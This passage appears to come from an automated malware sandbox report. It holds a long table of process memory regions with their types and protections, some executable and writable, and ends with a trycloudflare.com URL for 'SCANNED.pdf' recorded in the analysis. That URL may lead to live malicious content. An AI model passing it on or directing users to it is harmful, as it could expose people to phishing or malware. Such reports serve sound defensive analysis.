|
||
|
1DC2F655000
|
heap
|
page read and write
|
||
|
A06687F000
|
stack
|
page read and write
|
||
|
7FFAACBA0000
|
trusted library allocation
|
page read and write
|
||
|
1F545B5C000
|
heap
|
page read and write
|
||
|
D00E2FE000
|
unkown
|
page readonly
|
||
|
EFBFBFC000
|
stack
|
page read and write
|
||
|
76C93FE000
|
stack
|
page read and write
|
||
|
25C74159000
|
heap
|
page read and write
|
||
|
A06744D000
|
stack
|
page read and write
|
||
|
7FFAACBA4000
|
trusted library allocation
|
page read and write
|
||
|
25C6BD07000
|
trusted library allocation
|
page read and write
|
||
|
A065F03000
|
stack
|
page read and write
|
||
|
23D45626000
|
heap
|
page execute and read and write
|
||
|
D00E1FE000
|
unkown
|
page readonly
|
||
|
1F54A780000
|
trusted library allocation
|
page read and write
|
||
|
EFBF8FF000
|
stack
|
page read and write
|
||
|
A06697E000
|
stack
|
page read and write
|
||
|
25C5D5EF000
|
trusted library allocation
|
page read and write
|
||
|
21C0AC69000
|
heap
|
page read and write
|
||
|
D00D6FE000
|
unkown
|
page readonly
|
||
|
1F546310000
|
trusted library section
|
page readonly
|
||
|
D00E0FE000
|
unkown
|
page readonly
|
||
|
1F546350000
|
trusted library section
|
page readonly
|
||
|
21C0AC00000
|
heap
|
page read and write
|
||
|
D00F07E000
|
stack
|
page read and write
|
||
|
7FFB1D606000
|
unkown
|
page readonly
|
||
|
7FFAACB93000
|
trusted library allocation
|
page execute and read and write
|
||
|
23D2F03E000
|
trusted library allocation
|
page read and write
|
||
|
1F54525B000
|
heap
|
page read and write
|
||
|
AA27777000
|
stack
|
page read and write
|
||
|
D00E9FB000
|
stack
|
page read and write
|
||
|
1F54A8FE000
|
heap
|
page read and write
|
||
|
1F546220000
|
trusted library allocation
|
page read and write
|
||
|
2261442B000
|
heap
|
page read and write
|
||
|
23D456C0000
|
heap
|
page read and write
|
||
|
AA278FE000
|
stack
|
page read and write
|
||
|
1BB4EC30000
|
heap
|
page read and write
|
||
|
A0664FE000
|
stack
|
page read and write
|
||
|
23D2CEF4000
|
heap
|
page read and write
|
||
|
23D455BE000
|
heap
|
page read and write
|
||
|
1F54A842000
|
heap
|
page read and write
|
||
|
7FFB1E0F6000
|
unkown
|
page readonly
|
||
|
D00D7F9000
|
stack
|
page read and write
|
||
|
EFBF6FF000
|
stack
|
page read and write
|
||
|
7FFAACDF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACBAD000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAACC5C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAACBC0000
|
trusted library allocation
|
page read and write
|
||
|
23D2B480000
|
heap
|
page read and write
|
||
|
D00E6FE000
|
unkown
|
page readonly
|
||
|
7FFAACD70000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAACC86000
|
trusted library allocation
|
page execute and read and write
|
||
|
23D3D40F000
|
trusted library allocation
|
page read and write
|
||
|
AA2767D000
|
stack
|
page read and write
|
||
|
1F545274000
|
heap
|
page read and write
|
||
|
7FFAACDB0000
|
trusted library allocation
|
page read and write
|
||
|
25C73C98000
|
heap
|
page read and write
|
||
|
1F54A920000
|
heap
|
page read and write
|
||
|
1F54A799000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD51000
|
trusted library allocation
|
page read and write
|
||
|
1F54A922000
|
heap
|
page read and write
|
||
|
25C59ECF000
|
heap
|
page read and write
|
||
|
23D456A0000
|
heap
|
page read and write
|
||
|
D00EB7E000
|
stack
|
page read and write
|
||
|
25C5BC10000
|
heap
|
page execute and read and write
|
||
|
AA271AE000
|
stack
|
page read and write
|
||
|
53F95AF000
|
stack
|
page read and write
|
||
|
D00DF7E000
|
stack
|
page read and write
|
||
|
22614460000
|
heap
|
page read and write
|
||
|
1E516B60000
|
heap
|
page read and write
|
||
|
DCCD937000
|
stack
|
page read and write
|
||
|
25C73DFD000
|
heap
|
page read and write
|
||
|
1F54A902000
|
heap
|
page read and write
|
||
|
D00D5FE000
|
stack
|
page read and write
|
||
|
23D455EC000
|
heap
|
page read and write
|
||
|
1F545B1B000
|
heap
|
page read and write
|
||
|
7FFAACE80000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACE00000
|
trusted library allocation
|
page read and write
|
||
|
1F545A02000
|
heap
|
page read and write
|
||
|
AA275FE000
|
stack
|
page read and write
|
||
|
53F94AC000
|
stack
|
page read and write
|
||
|
7FFAACD40000
|
trusted library allocation
|
page read and write
|
||
|
23D3D472000
|
trusted library allocation
|
page read and write
|
||
|
1F54AAE0000
|
remote allocation
|
page read and write
|
||
|
23D2B690000
|
heap
|
page read and write
|
||
|
DCCDEFD000
|
stack
|
page read and write
|
||
|
25C5A060000
|
heap
|
page read and write
|
||
|
23D3D5B5000
|
trusted library allocation
|
page read and write
|
||
|
25C5D417000
|
trusted library allocation
|
page read and write
|
||
|
EFBF9FF000
|
stack
|
page read and write
|
||
|
22614400000
|
heap
|
page read and write
|
||
|
23D4555D000
|
heap
|
page read and write
|
||
|
7FFAACEF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACBB0000
|
trusted library allocation
|
page read and write
|
||
|
23D45517000
|
heap
|
page read and write
|
||
|
7FFAACDD0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACB92000
|
trusted library allocation
|
page read and write
|
||
|
A06627E000
|
stack
|
page read and write
|
||
|
7FFB1D5F0000
|
unkown
|
page readonly
|
||
|
D00D4FE000
|
unkown
|
page readonly
|
||
|
1F5459E1000
|
trusted library allocation
|
page read and write
|
||
|
1F54A740000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACEF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACC60000
|
trusted library allocation
|
page execute and read and write
|
||
|
21C0ABF0000
|
heap
|
page read and write
|
||
|
1F54AAE0000
|
remote allocation
|
page read and write
|
||
|
25C59E70000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACC4C000
|
trusted library allocation
|
page execute and read and write
|
||
|
A06637E000
|
stack
|
page read and write
|
||
|
7FFB1D610000
|
unkown
|
page read and write
|
||
|
A06647E000
|
stack
|
page read and write
|
||
|
AA27A7C000
|
stack
|
page read and write
|
||
|
1E516C00000
|
heap
|
page read and write
|
||
|
1F54A90A000
|
heap
|
page read and write
|
||
|
23D2B5D2000
|
heap
|
page read and write
|
||
|
1F545291000
|
heap
|
page read and write
|
||
|
1DC2F62B000
|
heap
|
page read and write
|
||
|
7FFAACBB0000
|
trusted library allocation
|
page read and write
|
||
|
1DC2F420000
|
heap
|
page read and write
|
||
|
A0666F7000
|
stack
|
page read and write
|
||
|
1F54A8CF000
|
heap
|
page read and write
|
||
|
1F54A770000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACDE0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD82000
|
trusted library allocation
|
page read and write
|
||
|
25C5D288000
|
trusted library allocation
|
page read and write
|
||
|
25C59F1A000
|
heap
|
page read and write
|
||
|
1F54AA20000
|
trusted library allocation
|
page read and write
|
||
|
1F54A6F0000
|
trusted library allocation
|
page read and write
|
||
|
D00D3FB000
|
stack
|
page read and write
|
||
|
1F54A800000
|
heap
|
page read and write
|
||
|
25C6BE49000
|
trusted library allocation
|
page read and write
|
||
|
1F545B1A000
|
heap
|
page read and write
|
||
|
1F54A90C000
|
heap
|
page read and write
|
||
|
25C59FA0000
|
heap
|
page readonly
|
||
|
23D2CEF0000
|
heap
|
page read and write
|
||
|
1F54A746000
|
trusted library allocation
|
page read and write
|
||
|
D00DCFE000
|
unkown
|
page readonly
|
||
|
22614360000
|
heap
|
page read and write
|
||
|
AA2757E000
|
stack
|
page read and write
|
||
|
1F545A00000
|
heap
|
page read and write
|
||
|
23D2CE70000
|
heap
|
page read and write
|
||
|
21C0AD02000
|
heap
|
page read and write
|
||
|
25C74128000
|
heap
|
page read and write
|
||
|
AA2854D000
|
stack
|
page read and write
|
||
|
1BB4EB30000
|
heap
|
page read and write
|
||
|
1F54A84F000
|
heap
|
page read and write
|
||
|
23D2B5B1000
|
heap
|
page read and write
|
||
|
D00DE7D000
|
stack
|
page read and write
|
||
|
25C59ED3000
|
heap
|
page read and write
|
||
|
1F545313000
|
heap
|
page read and write
|
||
|
7FFAACDB0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACE60000
|
trusted library allocation
|
page read and write
|
||
|
D00E4FE000
|
unkown
|
page readonly
|
||
|
1F546340000
|
trusted library section
|
page readonly
|
||
|
1F54A8D7000
|
heap
|
page read and write
|
||
|
2261444A000
|
heap
|
page read and write
|
||
|
1DC31380000
|
heap
|
page read and write
|
||
|
1E518674000
|
heap
|
page read and write
|
||
|
1F54A88C000
|
heap
|
page read and write
|
||
|
22614413000
|
heap
|
page read and write
|
||
|
7FFAACD5A000
|
trusted library allocation
|
page read and write
|
||
|
1F54A720000
|
trusted library allocation
|
page read and write
|
||
|
D00E07E000
|
stack
|
page read and write
|
||
|
25C5A064000
|
heap
|
page read and write
|
||
|
25C73E4D000
|
heap
|
page read and write
|
||
|
1F54AA80000
|
trusted library allocation
|
page read and write
|
||
|
25C59ED7000
|
heap
|
page read and write
|
||
|
D00DC7E000
|
stack
|
page read and write
|
||
|
1F5452B1000
|
heap
|
page read and write
|
||
|
25C74110000
|
heap
|
page read and write
|
||
|
A06657D000
|
stack
|
page read and write
|
||
|
1F54A918000
|
heap
|
page read and write
|
||
|
7FFAACD32000
|
trusted library allocation
|
page read and write
|
||
|
25C59F16000
|
heap
|
page read and write
|
||
|
AA2712E000
|
stack
|
page read and write
|
||
|
D00D9FB000
|
stack
|
page read and write
|
||
|
76C95FD000
|
stack
|
page read and write
|
||
|
23D2D380000
|
heap
|
page execute and read and write
|
||
|
1DC2F64A000
|
heap
|
page read and write
|
||
|
25C5BC80000
|
heap
|
page read and write
|
||
|
1BB50460000
|
heap
|
page read and write
|
||
|
1F54A890000
|
trusted library allocation
|
page read and write
|
||
|
23D2B570000
|
heap
|
page read and write
|
||
|
AA2747E000
|
stack
|
page read and write
|
||
|
25C5BD18000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACC50000
|
trusted library allocation
|
page execute and read and write
|
||
|
25C59F90000
|
trusted library allocation
|
page read and write
|
||
|
1F54A85E000
|
heap
|
page read and write
|
||
|
1F545B02000
|
heap
|
page read and write
|
||
|
25C74120000
|
heap
|
page read and write
|
||
|
25C59CE0000
|
heap
|
page read and write
|
||
|
DCCE0FD000
|
stack
|
page read and write
|
||
|
23D3D6EC000
|
trusted library allocation
|
page read and write
|
||
|
1F545240000
|
heap
|
page read and write
|
||
|
7FFAACC46000
|
trusted library allocation
|
page read and write
|
||
|
1F54A730000
|
trusted library allocation
|
page read and write
|
||
|
23D2D270000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E105000
|
unkown
|
page readonly
|
||
|
D00E7FE000
|
stack
|
page read and write
|
||
|
23D2B6C0000
|
heap
|
page read and write
|
||
|
23D2CEF6000
|
heap
|
page read and write
|
||
|
7FFAACEE0000
|
trusted library allocation
|
page read and write
|
||
|
D00DAFE000
|
unkown
|
page readonly
|
||
|
25C5C8C1000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACF10000
|
trusted library allocation
|
page read and write
|
||
|
D00D2FE000
|
unkown
|
page readonly
|
||
|
25C59E50000
|
heap
|
page read and write
|
||
|
1F54A8F0000
|
heap
|
page read and write
|
||
|
25C59E90000
|
heap
|
page read and write
|
||
|
1F54AA70000
|
trusted library allocation
|
page read and write
|
||
|
1BB4EA40000
|
heap
|
page read and write
|
||
|
7FFAACC76000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F545302000
|
heap
|
page read and write
|
||
|
1F54A742000
|
trusted library allocation
|
page read and write
|
||
|
1F54A902000
|
heap
|
page read and write
|
||
|
7FFAACE70000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACE30000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACEC0000
|
trusted library allocation
|
page read and write
|
||
|
25C59E20000
|
heap
|
page read and write
|
||
|
7FFAACEB0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACE50000
|
trusted library allocation
|
page read and write
|
||
|
1F54A90E000
|
heap
|
page read and write
|
||
|
1F545277000
|
heap
|
page read and write
|
||
|
23D2F042000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACEE0000
|
trusted library allocation
|
page read and write
|
||
|
1F546320000
|
trusted library section
|
page readonly
|
||
|
7FFAACEB0000
|
trusted library allocation
|
page read and write
|
||
|
25C73DBE000
|
heap
|
page read and write
|
||
|
1DC2F660000
|
heap
|
page read and write
|
||
|
23D2E9F2000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACEA0000
|
trusted library allocation
|
page read and write
|
||
|
25C73F33000
|
heap
|
page read and write
|
||
|
25C6BC91000
|
trusted library allocation
|
page read and write
|
||
|
D00CC7B000
|
stack
|
page read and write
|
||
|
D00E8FE000
|
unkown
|
page readonly
|
||
|
AA279FE000
|
stack
|
page read and write
|
There are 492 hidden memdumps, click here to show them.
DOM / HTML
|
URL
|
Malicious
|
|
|---|---|---|
|
https://floor-contemporary-genius-accommodation.trycloudflare.com/SCANNED.pdf
|
||
|
https://floor-contemporary-genius-accommodation.trycloudflare.com/SCANNED.pdf
|